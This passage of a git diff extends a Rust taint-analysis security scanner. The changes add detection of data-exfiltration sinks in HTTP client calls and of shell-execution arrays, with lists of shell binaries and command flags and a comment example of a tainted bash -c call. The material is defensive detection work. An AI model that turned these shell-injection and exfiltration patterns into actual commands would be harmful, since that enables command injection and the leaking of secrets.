+ let leaf = name.rsplit('/').next().unwrap_or(name); + matches!( + leaf, + "bash" + | "sh" + | "zsh" + | "dash" + | "ksh" + | "fish" + | "ash" + | "tcsh" + | "csh" + | "cmd" + | "cmd.exe" + | "powershell" + | "powershell.exe" + | "pwsh" + | "pwsh.exe" + ) +} + +/// True when `flag` is the "execute the following string as a shell command" +/// switch for the given `shell`. POSIX shells use `-c`; cmd.exe accepts +/// `/c` / `/C`; PowerShell uses `-Command` (also `-c` as alias) and +/// `-EncodedCommand`. +fn is_shell_command_flag(shell: &str, flag: &str) -> bool { + let leaf = shell.rsplit('/').next().unwrap_or(shell); + let is_cmd = matches!(leaf, "cmd" | "cmd.exe"); + let is_powershell = matches!(leaf, "powershell" | "powershell.exe" | "pwsh" | "pwsh.exe"); + if is_cmd { + return matches!(flag, "/c" | "/C" | "/k" | "/K"); + } + if is_powershell { + return matches!( + flag, + "-c" | "-Command" | "-command" | "-EncodedCommand" | "-encodedcommand" + ); + } + // POSIX shells. + flag == "-c" +} diff --git a/src/cfg/mod.rs b/src/cfg/mod.rs index 5e9e0743..428e4dd2 100644 --- a/src/cfg/mod.rs +++ b/src/cfg/mod.rs @@ -52,10 +52,11 @@ use literals::has_sql_placeholders; use literals::{ arg0_kind_and_interpolation, call_ident_of, def_use, detect_go_replace_call_sanitizer, detect_rust_replace_chain_sanitizer, extract_arg_callees, extract_arg_string_literals, - extract_arg_uses, extract_const_keyword_arg, extract_const_string_arg, - extract_destination_field_idents, extract_kwargs, extract_literal_rhs, find_call_node, - find_call_node_deep, find_chained_inner_call, has_keyword_arg, has_only_literal_args, - is_parameterized_query_call, java_chain_arg0_kind_for_method, js_chain_arg0_kind_for_method, + extract_arg_uses, extract_const_keyword_arg, extract_const_macro_arg, extract_const_string_arg, + extract_destination_field_pairs, extract_destination_kwarg_pairs, extract_kwargs, + extract_literal_rhs, extract_shell_array_payload_idents, find_call_node, find_call_node_deep, + 
find_chained_inner_call, has_keyword_arg, has_only_literal_args, is_parameterized_query_call, + java_chain_arg0_kind_for_method, js_chain_arg0_kind_for_method, js_chain_outer_method_for_inner, ruby_chain_arg0_for_method, walk_chain_inner_call_args, }; use params::{ @@ -312,6 +313,15 @@ pub struct CallMeta { /// [`Self::destination_uses`]). #[serde(default)] pub gate_filters: Vec, + /// True when this call expression is a constructor invocation + /// (e.g. JS/TS `new Stripe(key)`, PHP `new PDO(...)`). The SSA Call + /// transfer uses this to narrow the constructed value's caps: a wrapper + /// object instance is structurally not a path string, format string, + /// URL component, or JSON input, so out-of-process side-effect bits + /// (FILE_IO, FMT_STRING, URL_ENCODE, JSON_PARSE) on the arguments + /// must not survive into the constructed object. + #[serde(default)] + pub is_constructor: bool, } /// One gate's contribution at a call site whose callee matches multiple @@ -329,6 +339,15 @@ pub struct GateFilter { /// considers SSA values whose `var_name` matches one of `names` (object- /// literal destination fields lifted at CFG time). `None` ⇒ whole arg. pub destination_uses: Option>, + /// Parallel to [`Self::destination_uses`]: for each entry, the + /// destination object-literal field name (e.g. `"body"`, `"headers"`, + /// `"json"`) where the corresponding ident was bound. Empty when + /// `destination_uses` is `None` or the gate had no + /// `object_destination_fields` configured. Consumed by diag rendering + /// to embed the destination field in `DATA_EXFIL` messages and SARIF + /// `properties.data_exfil_field`. + #[serde(default, skip_serializing_if = "Vec::is_empty")] + pub destination_fields: Vec, } /// Taint-classification and variable-flow metadata. @@ -450,6 +469,13 @@ pub struct NodeInfo { /// up the field's declared `TypeKind`. Strictly additive, when /// `None`, the legacy copy-prop semantics apply. 
pub member_field: Option, + /// True when this assignment / declaration's RHS is a function or + /// lambda literal (`obj.handler = (e) => {...}`, `let f = function(){}`). + /// State analysis uses this to suppress resource-ownership transfer: + /// storing a function reference into a property does not move the + /// resources captured by the closure body, so the lifecycle of those + /// captures must remain unchanged on the assignment node. + pub rhs_is_function_literal: bool, } impl NodeInfo { @@ -1564,6 +1590,92 @@ pub(super) fn push_node<'a>( let extra = analysis_rules.map(|r| r.extra_labels.as_slice()); let mut labels = classify_all(lang, &text, extra); + // Rust chain-text classification. The default `text` for a Rust + // CallMethod is `{root_receiver}.{method}`, where `root_receiver` + // is the leftmost identifier after walking through every nested + // call/method receiver. That convention loses the intermediate + // chain methods, so a body-binding chain like + // `Client::post(url).body(payload).send()` reduces to + // `Client::post.send` and rules keyed on `body.send` / + // `RequestBuilder.body` cannot fire. + // + // Reclassify against the call-AST's source text (with paren groups + // stripped) so suffix matchers covering chain shapes + // (`body.send`, `body_string`, `Request::builder.body`, ...) attach. + // Strictly additive: we union new labels with the existing ones, + // never override. Limited to Rust to avoid disturbing the other + // languages' chain conventions. + if lang == "rust" { + if let Some(cn) = find_call_node(ast, lang) { + if let Some(chain_raw) = text_of(cn, code) { + // Multi-line Rust chains (`Client::new()\n .post(url)\n + // .body(p)\n .send()`) preserve interior whitespace in + // the source slice, which would prevent suffix matchers + // like `body.send` from firing. Strip whitespace before + // normalizing paren groups, mirroring the same trick + // used by `find_chained_inner_call` for JS/TS chains. 
+ let chain_compact: String = + chain_raw.chars().filter(|c| !c.is_whitespace()).collect(); + let chain_text = crate::labels::normalize_chained_call_for_classify(&chain_compact); + if chain_text != text { + let chain_labels = classify_all(lang, &chain_text, extra); + for l in chain_labels { + if !labels.contains(&l) { + labels.push(l); + } + } + } + // Also try classification against the chain with + // trailing identity methods peeled. Rust chains often + // end in `.unwrap()` / `.expect("...")` / `.await` / + // `.clone()` etc., which obscure the body-bind verb + // for suffix matchers. E.g. hyper's + // `Request::builder().method(..).uri(..).body(p).unwrap()` + // peels to `...body`, allowing a simpler `body` / + // `Request::builder.body` matcher to fire. + let peeled = crate::ssa::type_facts::peel_identity_suffix(&chain_text); + if peeled != chain_text && peeled != text { + let peeled_labels = classify_all(lang, &peeled, extra); + for l in peeled_labels { + if !labels.contains(&l) { + labels.push(l); + } + } + } + // Pattern synthesis: the hyper request-builder chain + // (`hyper::Request::builder().method(..).uri(..).body(p)`) + // can interleave `.method`, `.uri`, `.header`, `.version` + // etc. between `Request::builder` and the body-bind step. + // Suffix matchers can't span those, so synthesise a + // DATA_EXFIL sink whenever the chain begins with + // `Request::builder` and ends in a body-binding verb. + // Strictly additive: no labels are removed, only added, + // and the synthesis only fires when an explicit Sink + // hasn't already attached. 
+ let chain_for_synth = if peeled != chain_text { + &peeled + } else { + &chain_text + }; + if !labels + .iter() + .any(|l| matches!(l, DataLabel::Sink(c) if c.contains(crate::labels::Cap::DATA_EXFIL))) + && (chain_for_synth.contains("Request::builder.") + || chain_for_synth.contains("hyper::Request::builder.")) + { + let last_seg = + chain_for_synth.rsplit('.').next().unwrap_or(chain_for_synth); + if matches!( + last_seg, + "body" | "body_mut" | "body_string" | "body_json" | "body_bytes" + ) { + labels.push(DataLabel::Sink(crate::labels::Cap::DATA_EXFIL)); + } + } + } + } + } + // If the outermost call didn't classify, try inner/nested calls. // E.g. `str(eval(expr))`, `str` is not a sink, but `eval` is. // When the callee is overridden, save the original for container ops @@ -1727,7 +1839,23 @@ pub(super) fn push_node<'a>( let mut sink_payload_args: Option> = None; let mut destination_uses: Option> = None; let mut gate_filters: Vec = Vec::new(); - if labels.is_empty() { + // Gates run when no flat `Sink` label is already present, OR when a + // matching gate restricts the payload-arg set on top of an existing flat + // sink. Source / Sanitizer labels are orthogonal — a callee like + // Python's `requests.post` is a `Source` for its response object AND a + // gated `Sink` for its URL/body argument positions; both should attach. + // + // Payload-arg refinement: when a flat sink matches a callee that ALSO + // has a gate entry restricting `payload_args`, the gate's `payload_args` + // are propagated to `sink_payload_args` so only those positions are + // taint-checked. Example: `execSync(cmd, { env: process.env })` matches + // the bare `execSync` flat `Sink(SHELL_ESCAPE)` AND the gate `=execSync` + // with `payload_args: &[0]`; without the refinement, the flat rule's + // implicit "all args" would flag `process.env` flowing into the options + // object's `env` field. The gate's labels themselves are deduped so a + // single capability never double-attributes. 
+ let has_sink_label = labels.iter().any(|l| matches!(l, DataLabel::Sink(_))); + { let gate_call = call_ast.or_else(|| find_call_node_deep(ast, lang, 4)); if let Some(cn) = gate_call { let gate_callee_text = if call_ast.is_some() { @@ -1746,7 +1874,22 @@ pub(super) fn push_node<'a>( let matches = classify_gated_sink( lang, &gate_callee_text, - |idx| extract_const_string_arg(cn, idx, code), + |idx| { + extract_const_string_arg(cn, idx, code).or_else(|| { + // C/C++ preprocessor macros and PHP `define`d constants + // surface as identifier nodes, not string literals. + // Falling back to the macro-arg extractor for those + // languages lets gates like `curl_easy_setopt` / + // `curl_setopt` activate on a `CURLOPT_POSTFIELDS` + // ident match instead of firing conservatively on + // every positional arg. + if matches!(lang, "c" | "cpp" | "c++" | "php") { + extract_const_macro_arg(cn, idx, code) + } else { + None + } + }) + }, |kw| extract_const_keyword_arg(cn, kw, code), |kw| has_keyword_arg(cn, kw, code), ); @@ -1758,11 +1901,23 @@ pub(super) fn push_node<'a>( // * a `GateFilter` carrying that gate's specific // `(label_caps, payload_args, destination_uses)` so // the SSA sink scan can attribute taint per-cap. + // + // When a flat sink already matches, gate labels are deduped + // so the same capability isn't attributed twice (once flat, + // once gated). Their `payload_args` still flow into + // `sink_payload_args` so the gate's arg-position restriction + // applies on top of the flat sink. let mut union_payload: Vec = Vec::new(); for gm in &matches { - labels.push(gm.label); + if has_sink_label { + if !labels.contains(&gm.label) { + labels.push(gm.label); + } + } else { + labels.push(gm.label); + } - let payload_vec: Vec = + let mut payload_vec: Vec = if gm.payload_args == crate::labels::ALL_ARGS_PAYLOAD { // Dynamic-activation sentinel: every positional arg is // conservatively a payload. 
Expand using the actual @@ -1780,19 +1935,57 @@ pub(super) fn push_node<'a>( // checks to identifiers under those fields. Non-object // arg forms return `None` from the extractor and the gate // falls back to whole-arg positional filtering. + // + // The pair form preserves which object-literal field each + // ident was bound to (e.g. `body` vs `headers` vs `json`) + // so diag rendering can attribute `DATA_EXFIL` findings to + // a specific destination field. let mut dest_uses: Option> = None; + let mut dest_fields: Vec = Vec::new(); if !gm.object_destination_fields.is_empty() { + let mut all_pairs: Vec<(String, String)> = Vec::new(); + let mut had_object_match = false; for &pos in gm.payload_args { - if let Some(names) = extract_destination_field_idents( + if let Some(pairs) = extract_destination_field_pairs( cn, pos, gm.object_destination_fields, code, ) { - dest_uses = Some(names); + all_pairs.extend(pairs); + had_object_match = true; break; } } + + // Direct kwargs: languages where destination-bearing + // fields are passed as `keyword_argument` siblings of + // the positional args (Python `data=`, Ruby kwargs). + // SSA lowering folds kwarg idents into the implicit + // args group at index `arity`, so we expand + // `payload_vec` to include that position; the + // `destination_filter` then narrows to the kwarg + // ident's `var_name`. 
+ let kwarg_pairs = + extract_destination_kwarg_pairs(cn, gm.object_destination_fields, code); + if !kwarg_pairs.is_empty() { + let arity = extract_arg_uses(cn, code).len(); + if !payload_vec.contains(&arity) { + payload_vec.push(arity); + } + for pair in kwarg_pairs { + if !all_pairs.iter().any(|(_, v)| v == &pair.1) { + all_pairs.push(pair); + } + } + } + + if had_object_match || !all_pairs.is_empty() { + let (fields, vars): (Vec, Vec) = + all_pairs.into_iter().unzip(); + dest_uses = Some(vars); + dest_fields = fields; + } } let label_caps = match gm.label { @@ -1809,6 +2002,7 @@ pub(super) fn push_node<'a>( label_caps, payload_args: payload_vec, destination_uses: dest_uses, + destination_fields: dest_fields, }); } if !union_payload.is_empty() { @@ -1826,6 +2020,65 @@ pub(super) fn push_node<'a>( } } + // ── Inline shell-array sink synthesis ──────────────────────────────── + // + // Recognise `[, "-c", ]` (and `cmd /c `) + // appearing as an argument to *any* call. The shell-array shape itself + // is the gate, regardless of callee, so this fires through user-defined + // wrappers like `execInContainer(id, ["bash", "-c", `echo ${tainted}`])` + // without needing per-wrapper summary annotations. Only fires for JS/TS + // because the array-literal grammar (`array` node) and shell-form usage + // are JS/TS conventions; other languages use different shapes for + // shell-exec wrappers. + // + // The inner array also covers Dockerode's + // `container.exec({Cmd: [shell, "-c", payload]})`: the helper looks + // inside object-literal args for shell-array values under any field. + // + // Existing FP carve-outs are preserved. `["ls", "-la"]` doesn't match + // (element 0 is not a known shell). `untaintedArrayVariable` doesn't + // match (variable, not literal). `execSync(cmd, { env: process.env })` + // doesn't match (string + object args, no shell-array literal). 
When + // the payload elements are constant strings the helper returns no + // match, so a literal `["bash", "-c", "ls -la"]` doesn't fire either. + if matches!(lang, "javascript" | "js" | "typescript" | "ts") { + if let Some(cn) = call_ast.or_else(|| find_call_node_deep(ast, lang, 4)) { + let shell_matches = extract_shell_array_payload_idents(cn, code); + if !shell_matches.is_empty() { + let shell_label = DataLabel::Sink(Cap::SHELL_ESCAPE); + let already_has_shell_sink = labels.iter().any(|l| match l { + DataLabel::Sink(c) => c.contains(Cap::SHELL_ESCAPE), + _ => false, + }); + if !already_has_shell_sink { + labels.push(shell_label); + } + + let mut union_payload: Vec = sink_payload_args.clone().unwrap_or_default(); + for sm in shell_matches { + if !union_payload.contains(&sm.arg_position) { + union_payload.push(sm.arg_position); + } + gate_filters.push(GateFilter { + label_caps: Cap::SHELL_ESCAPE, + payload_args: vec![sm.arg_position], + destination_uses: Some(sm.payload_idents), + destination_fields: Vec::new(), + }); + } + if !union_payload.is_empty() { + sink_payload_args = Some(union_payload); + } + // Legacy single-gate path: when this is the only gate filter, + // populate the top-level destination_uses too so the SSA + // fast-path stays consistent with the multi-gate behaviour. + if gate_filters.len() == 1 { + destination_uses = gate_filters[0].destination_uses.clone(); + } + } + } + } + // Pattern-based sanitizer synthesis: recognise a Rust // `param.replace(LIT, LIT)[.replace(LIT, LIT)]*` chain that provably strips // path-traversal or HTML metacharacters. The CFG collapses the whole @@ -2296,6 +2549,20 @@ pub(super) fn push_node<'a>( // just bloat every labeled Call node. let callee_span = inner_callee_span.or(inner_text_span).filter(|s| *s != span); + // Constructor detection: a `new X(...)` call carries different cap + // semantics than a plain function call. 
The SSA Call transfer uses + // this flag to narrow the constructed value's caps so out-of-process + // side-effect bits (FILE_IO, FMT_STRING, URL_ENCODE, JSON_PARSE) on + // the arguments don't survive into a wrapper-object instance. + // Recognised forms: + // * JS/TS `new_expression` + // * Java/C++ `object_creation_expression` + // * PHP `object_creation_expression` + let is_constructor = ast.kind() == "new_expression" + || ast.kind() == "object_creation_expression" + || call_ast + .is_some_and(|cn| matches!(cn.kind(), "new_expression" | "object_creation_expression")); + let idx = g.add_node(NodeInfo { kind, call: CallMeta { @@ -2311,6 +2578,7 @@ pub(super) fn push_node<'a>( arg_string_literals, destination_uses, gate_filters, + is_constructor, }, taint: TaintMeta { labels, @@ -2339,6 +2607,7 @@ pub(super) fn push_node<'a>( is_eq_with_const: detect_eq_with_const(ast, lang), is_numeric_length_access: detect_numeric_length_access(ast, lang, code), member_field: detect_member_field_assignment(ast, code), + rhs_is_function_literal: rhs_is_function_literal(ast, lang), }); debug!( @@ -2404,7 +2673,10 @@ fn rhs_is_function_literal(ast: Node, lang: &str) -> bool { if candidate.is_none() { // Walk one level into declarations whose direct child is the // declarator (variable_declaration → variable_declarator → - // value). + // value), or expression-statement wrappers whose direct child is + // an assignment_expression / assignment with a `right` field + // (JS `expression_statement > assignment_expression`, Python + // `expression_statement > assignment`). 
let mut cursor = ast.walk(); for c in ast.children(&mut cursor) { if matches!( @@ -2417,6 +2689,11 @@ fn rhs_is_function_literal(ast: Node, lang: &str) -> bool { if candidate.is_some() { break; } + } else if matches!(lookup(lang, c.kind()), Kind::Assignment) { + candidate = c.child_by_field_name("right"); + if candidate.is_some() { + break; + } } } } @@ -4417,7 +4694,23 @@ fn apply_promisify_labels( let Some(alias) = aliases.get(&callee) else { continue; }; - let wrapped_labels = classify_all(lang, &alias.wrapped, extra); + // Inherit both flat and gated labels from the wrapped callee. + // Gated sinks (e.g. `child_process.exec`) carry the same + // capability semantics as flat sinks, just with arg-position + // filtering at the call site; the promisify alias should + // surface the wrapped function's sink class regardless of + // which arm originally classified it. + let mut wrapped_labels: Vec = + classify_all(lang, &alias.wrapped, extra) + .into_iter() + .collect(); + for gm in + classify_gated_sink(lang, &alias.wrapped, |_| None, |_| None, |_| false).iter() + { + if !wrapped_labels.contains(&gm.label) { + wrapped_labels.push(gm.label); + } + } if wrapped_labels.is_empty() { continue; } diff --git a/src/cfg_analysis/guards.rs b/src/cfg_analysis/guards.rs index 672a5a11..260ca73b 100644 --- a/src/cfg_analysis/guards.rs +++ b/src/cfg_analysis/guards.rs @@ -678,12 +678,30 @@ fn find_guard_nodes(ctx: &AnalysisContext) -> Vec<(NodeIndex, Cap)> { if info.kind == StmtKind::If { if let Some(cond_text) = &info.condition_text { let kind = classify_condition(cond_text); + // For `AllowlistCheck`, also confirm a target identifier was + // extractable. When the receiver-method form carries a + // string-literal arg (`filePath.includes("/")`, + // `path.contains("..")`), `extract_allowlist_target` returns + // `None` because the argument isn't an identifier. 
Those + // shapes are presence-checks, not real allowlist tests against + // a collection variable, and shouldn't dominate every + // downstream sink as a structural guard with `Cap::all()`. + // `classify_condition` itself stays unchanged (an existing + // test locks in its broad return for the receiver-method form, + // and the SSA branch-narrowing layer reads the kind for its + // own purposes). + let allowlist_has_target = if kind == PredicateKind::AllowlistCheck { + crate::taint::path_state::classify_condition_with_target(cond_text) + .1 + .is_some() + } else { + true + }; if matches!( kind, - PredicateKind::AllowlistCheck - | PredicateKind::TypeCheck - | PredicateKind::ValidationCall - ) { + PredicateKind::TypeCheck | PredicateKind::ValidationCall, + ) || (kind == PredicateKind::AllowlistCheck && allowlist_has_target) + { result.push((idx, Cap::all())); } else if cond_indirect_validator_callee(info, ctx).is_some() { // Indirect-validator pattern: @@ -995,7 +1013,25 @@ impl CfgAnalysis for UnguardedSink { // is the only other operand. The simpler `is_all_args_constant` // check above rejects that mixed shape because it forbids real // parameters in operand position. - if !has_taint && ssa_all_sink_operands_const_or_param(ctx, *sink) { + // + // Exemption: shell-array gate filters. The + // `extract_shell_array_payload_idents` detector recognises + // `[, "-c", ]` arrays at any call site and emits a + // `Sink(SHELL_ESCAPE)` label with `destination_uses` narrowed to + // the payload-element idents. When the array shape itself is the + // gate, an unrelated reassign-to-const elsewhere in the body + // (`const flag = true; if (flag) {}`) does not erase the + // shell-exec intent — the construction of `[bash, -c, x]` is by + // itself the dangerous operation. Skip this suppression so the + // structural finding survives in closed-world contexts where no + // taint source has been resolved yet. 
+ let has_shell_array_gate = sink_info.call.gate_filters.iter().any(|gf| { + gf.label_caps.contains(Cap::SHELL_ESCAPE) && gf.destination_uses.is_some() + }); + if !has_taint + && !has_shell_array_gate + && ssa_all_sink_operands_const_or_param(ctx, *sink) + { continue; } diff --git a/src/cfg_analysis/mod.rs b/src/cfg_analysis/mod.rs index 7f68f6a3..54630d1f 100644 --- a/src/cfg_analysis/mod.rs +++ b/src/cfg_analysis/mod.rs @@ -125,6 +125,13 @@ pub struct AnalysisContext<'a> { /// the function-declaration level, the gap only matters when the /// auth call has to live inside the body. pub auth_decorators: &'a [String], + /// Names of variables whose `.close()` / release calls live in a + /// nested closure body somewhere else in the file (e.g. + /// `socket.on("close", () => ws.close())`). ResourceMisuse uses this + /// to suppress `cfg-resource-leak` for handles whose cleanup happens + /// in a callback the per-body CFG can't observe. When `None`, no + /// closure-based suppression is applied. + pub closure_released_var_names: Option<&'a std::collections::HashSet>, } pub trait CfgAnalysis { diff --git a/src/cfg_analysis/resources.rs b/src/cfg_analysis/resources.rs index 3feffd0d..4071da39 100644 --- a/src/cfg_analysis/resources.rs +++ b/src/cfg_analysis/resources.rs @@ -442,6 +442,23 @@ impl CfgAnalysis for ResourceMisuse { if pair.resource_name == "mutex" && !has_explicit_lock_acquire(ctx, acquire) { continue; } + // Suppress when a sibling closure / event handler in + // this file releases the same variable. Common JS/TS + // shape: `const ws = new WebSocket(url); + // socket.on("close", () => ws.close())`. The release + // node lives in a nested body the per-body CFG can't + // see, so the structural "no release on this exit + // path" check fires erroneously. Match by acquired + // variable name; closure captures share the binding + // name with the outer handle. 
+ if let Some(acq_var) = ctx.cfg[acquire].taint.defines.as_deref() + && ctx + .closure_released_var_names + .map(|s| s.contains(acq_var)) + .unwrap_or(false) + { + continue; + } let info = &ctx.cfg[acquire]; let callee_desc = info.call.callee.as_deref().unwrap_or("(acquire)"); diff --git a/src/cfg_analysis/tests.rs b/src/cfg_analysis/tests.rs index 852de09a..52676174 100644 --- a/src/cfg_analysis/tests.rs +++ b/src/cfg_analysis/tests.rs @@ -33,6 +33,7 @@ fn parse_and_analyse( body_const_facts: None, type_facts: None, auth_decorators: &[], + closure_released_var_names: None, }; analysis.run(&ctx) } @@ -61,6 +62,7 @@ fn parse_and_run_all(src: &[u8], lang_str: &str, ts_lang: Language) -> Vec( body_const_facts: facts.as_ref(), type_facts: facts.as_ref().map(|f| &f.type_facts), auth_decorators: &[], + closure_released_var_names: None, }; analysis.run(&ctx) } @@ -1225,6 +1229,7 @@ fn config_sanitizer_suppresses_unguarded_sink() { body_const_facts: None, type_facts: None, auth_decorators: &[], + closure_released_var_names: None, }; let findings = run_all(&ctx); @@ -1703,6 +1708,7 @@ fn cfg_only_no_taint_produces_low_severity() { body_const_facts: None, type_facts: None, auth_decorators: &[], + closure_released_var_names: None, }; let findings = guards::UnguardedSink.run(&ctx); diff --git a/src/commands/mod.rs b/src/commands/mod.rs index cfc826e9..18d50749 100644 --- a/src/commands/mod.rs +++ b/src/commands/mod.rs @@ -32,6 +32,7 @@ pub fn handle_command( ); } let _ = crate::utils::analysis_options::install(config.analysis.engine); + let _ = crate::utils::detector_options::install(config.detectors.clone()); }; match command { @@ -293,6 +294,9 @@ pub fn handle_command( "analysis-engine runtime already installed; CLI engine flags ignored" ); } + // Detector knobs (currently `[detectors.data_exfil]`) are + // resolved straight from config; no CLI overrides yet. 
+ let _ = crate::utils::detector_options::install(config.detectors.clone()); // ── --explain-engine: print resolved config and exit ──────── if explain_engine { diff --git a/src/constraint/domain.rs b/src/constraint/domain.rs index 342c3897..7fb6a937 100644 --- a/src/constraint/domain.rs +++ b/src/constraint/domain.rs @@ -184,6 +184,7 @@ fn type_kind_index(kind: &TypeKind) -> u32 { TypeKind::Url => 10, TypeKind::HttpClient => 11, TypeKind::LocalCollection => 12, + TypeKind::RequestBuilder => 13, // the analysis DTO types carry per-field structural info that the // bitset domain can't represent. Collapse to Unknown so callers // still see "any type possible" rather than crashing on an @@ -208,6 +209,7 @@ fn type_kind_from_index(idx: u32) -> Option { 10 => Some(TypeKind::Url), 11 => Some(TypeKind::HttpClient), 12 => Some(TypeKind::LocalCollection), + 13 => Some(TypeKind::RequestBuilder), _ => None, } } diff --git a/src/constraint/lower.rs b/src/constraint/lower.rs index 2115deb6..d2cc0de3 100644 --- a/src/constraint/lower.rs +++ b/src/constraint/lower.rs @@ -610,6 +610,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/database.rs b/src/database.rs index 4addac12..78afc1e0 100644 --- a/src/database.rs +++ b/src/database.rs @@ -2516,6 +2516,7 @@ fn ssa_summaries_round_trip() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ), ( @@ -2550,6 +2551,7 @@ fn ssa_summaries_round_trip() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ), ]; @@ -2722,6 +2724,7 @@ fn ssa_summaries_hash_rescan_replaces_stale() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), 
typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )]; idx.replace_ssa_summaries_for_file(&f, &hash_v1, &sums_v1) @@ -2758,6 +2761,7 @@ fn ssa_summaries_hash_rescan_replaces_stale() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )]; idx.replace_ssa_summaries_for_file(&f, &hash_v2, &sums_v2) @@ -2815,6 +2819,7 @@ fn clear_drops_ssa_summaries_table() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, )]; idx.replace_ssa_summaries_for_file(&f, &hash, &sums) @@ -2871,6 +2876,7 @@ fn make_test_callee_body( exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::new(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }, opt: crate::ssa::OptimizeResult { const_values: std::collections::HashMap::new(), @@ -3086,6 +3092,7 @@ fn make_test_ssa_summary() -> crate::summary::ssa_summary::SsaFuncSummary { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], } } @@ -3847,3 +3854,59 @@ fn ssa_summaries_pre_phase5_blob_decodes_with_empty_field_points_to() { "missing field_points_to must default to empty", ); } + +/// Pre-`param_to_gate_filters` blob compatibility: a summary serialised +/// before this field existed deserialises with the empty default. +/// `#[serde(default)]` on the field means old SQLite blobs round-trip +/// without a schema migration, the new field is stored inside the JSON +/// `summary` column so SQL-level columns are unchanged. +#[test] +fn ssa_summaries_pre_gate_filters_blob_decodes_with_empty_param_to_gate_filters() { + use crate::summary::ssa_summary::SsaFuncSummary; + + // Hand-craft JSON without the `param_to_gate_filters` key. 
+ let pre_gate_filters_json = r#"{ + "param_to_return": [], + "param_to_sink": [], + "source_caps": 0, + "param_to_sink_param": [], + "param_container_to_return": [], + "param_to_container_store": [], + "return_type": null, + "return_abstract": null, + "source_to_callback": [], + "receiver_to_return": null, + "receiver_to_sink": 0, + "abstract_transfer": [], + "param_return_paths": [], + "return_path_facts": [], + "typed_call_receivers": [] + }"#; + let sum: SsaFuncSummary = serde_json::from_str(pre_gate_filters_json).unwrap(); + assert!( + sum.param_to_gate_filters.is_empty(), + "missing param_to_gate_filters must default to empty", + ); +} + +/// Round-trip: a summary with a populated `param_to_gate_filters` +/// survives JSON serialise + deserialise, including the per-position +/// cap-mask values needed to preserve SSRF-vs-DATA_EXFIL splits across +/// the function-summary boundary. +#[test] +fn ssa_summaries_param_to_gate_filters_round_trip() { + use crate::labels::Cap; + use crate::summary::ssa_summary::SsaFuncSummary; + + let mut sum = SsaFuncSummary::default(); + sum.param_to_gate_filters.push((0, Cap::SSRF)); + sum.param_to_gate_filters.push((1, Cap::DATA_EXFIL)); + + let json = serde_json::to_string(&sum).expect("serialize"); + let restored: SsaFuncSummary = serde_json::from_str(&json).expect("deserialize"); + assert_eq!( + restored.param_to_gate_filters, + vec![(0, Cap::SSRF), (1, Cap::DATA_EXFIL)], + "per-position cap masks must round-trip exactly", + ); +} diff --git a/src/evidence.rs b/src/evidence.rs index 6f16f5c7..e7208e7c 100644 --- a/src/evidence.rs +++ b/src/evidence.rs @@ -218,6 +218,14 @@ pub struct Evidence { /// under-budget findings and skipped during serialization in that case. #[serde(default, skip_serializing_if = "smallvec::SmallVec::is_empty")] pub engine_notes: smallvec::SmallVec<[crate::engine_notes::EngineNote; 2]>, + + /// For `Cap::DATA_EXFIL` findings, the destination object-literal field + /// the tainted value reached (e.g. 
`"body"`, `"headers"`, `"json"`). + /// `None` for non-exfil findings, for exfil findings whose payload arg + /// was not an object literal, or when the sink was resolved through a + /// summary path that did not preserve destination metadata. + #[serde(default, skip_serializing_if = "Option::is_none")] + pub data_exfil_field: Option, } fn is_zero_u16(v: &u16) -> bool { @@ -301,7 +309,15 @@ pub fn compute_confidence(diag: &Diag) -> Confidence { let id = &diag.id; - let base = if id.starts_with("taint-") { + let base = if id.starts_with("taint-data-exfiltration") { + // DATA_EXFIL is calibrated independently from the generic taint path: + // the value at risk is the leak of an *already-sensitive* source, not + // the construction of an attacker payload, so the points-based scoring + // tuned for code-exec / SSRF / SQLi over-credits these findings. Route + // to a narrower decision tree that asks "did we corroborate a real + // string body leaving the process?" instead. + compute_data_exfil_confidence(diag) + } else if id.starts_with("taint-") { compute_taint_confidence(diag) } else if id.starts_with("state-") { match id.as_str() { @@ -458,13 +474,71 @@ fn compute_taint_confidence(diag: &Diag) -> Confidence { } } +/// Confidence routing for `taint-data-exfiltration` findings. +/// +/// The generic taint scorer ranks DATA_EXFIL too aggressively: a Sensitive +/// source plus a sink call is enough to push it into the Medium/High band, +/// but the leak class needs corroboration that a real string body actually +/// leaves the process (otherwise we surface every `fetch(..., {body: x})` +/// where `x` happens to be Sensitive-tagged). This routing is deliberately +/// capped at Medium and only fires Medium when the symbolic execution +/// verdict confirms the path (abstract interpretation participates only as +/// a sink-suppression filter inside SSA taint and does not surface a +/// separate verdict here). 
+/// +/// Routing: +/// * Source < Sensitive → Low (caller already strips DATA_EXFIL for +/// Plain sources, but defensively floor here). +/// * Symbolic verdict `Confirmed` → Medium (symex produced a witness +/// that a tainted string reaches the body argument). +/// * Symbolic verdict `Inconclusive` / `NotAttempted` / no symbolic +/// analysis → Low (instruction's "Inconclusive" tier; the `Confidence` +/// enum has no separate Inconclusive variant so it floors to Low). +/// * Symbolic verdict `Infeasible` → Low (path proven dead). +/// +/// After routing, a `path_validated` guard on the diag drops the result +/// one tier (Medium → Low; Low stays Low) and `apply_engine_notes_cap` +/// applies the standard engine-notes cap. +fn compute_data_exfil_confidence(diag: &Diag) -> Confidence { + let ev = match &diag.evidence { + Some(e) => e, + None => return Confidence::Low, + }; + + let is_sensitive = ev + .source_kind + .map(|k| k.sensitivity() >= crate::labels::Sensitivity::Sensitive) + .unwrap_or(false); + if !is_sensitive { + return Confidence::Low; + } + + let mut base = match ev.symbolic.as_ref().map(|s| s.verdict) { + Some(Verdict::Confirmed) => Confidence::Medium, + Some(Verdict::Infeasible) => Confidence::Low, + Some(Verdict::Inconclusive) | 